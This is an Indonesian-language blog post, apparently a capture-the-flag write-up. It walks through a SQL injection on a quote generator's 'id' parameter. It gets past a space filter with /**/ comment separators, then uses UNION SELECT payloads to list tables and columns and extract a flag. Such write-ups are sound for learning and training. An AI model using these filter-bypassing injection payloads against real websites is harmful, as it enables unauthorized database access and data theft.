disoal ini diberikan sebuah web, ketika saya pencet generate button maka muncul sebuah quote dan terdapat parameter GET dengan nama id dengan value 2, lalu saya coba beri tanda ' ternyata tidak ada error apa-apa.
selanjutnya saya coba dengan UNION SELECT ternyata hasilnya muncul pesan UNIONSELECT sepertinya saya tidak bisa menggunakan spasi karena difilter, tetapi masih bisa diakali dengan /**/ Query "/**/UNION/**/SELECT/**/1,2#" karena terdapat dua kolom.
selanjutnya melihat table yang terdapat pada database dengan Query "/**/UNION/**/SELECT/**/1,table_name/**/FROM/**/information_schema.tables/**/WHERE/**/table_schema=database()#", ternyata ternyata terdapat 2 table.
selanjutnya mencari kolumn saya pakai Query "/**/UNION/**/SELECT/**/1,column_name/**/FROM/**/information_schema.columns/**/WHERE/**/table_schema=database()#", terdapat beberapa kolumn namun saya fokus pada kolumn flag.
melihat isi kolumn dengan Query "/**/UNION/**/SELECT/**/1,flag/**/FROM/**/alkdjf4iu#", maka flag akan muncul.
No comments:
Post a Comment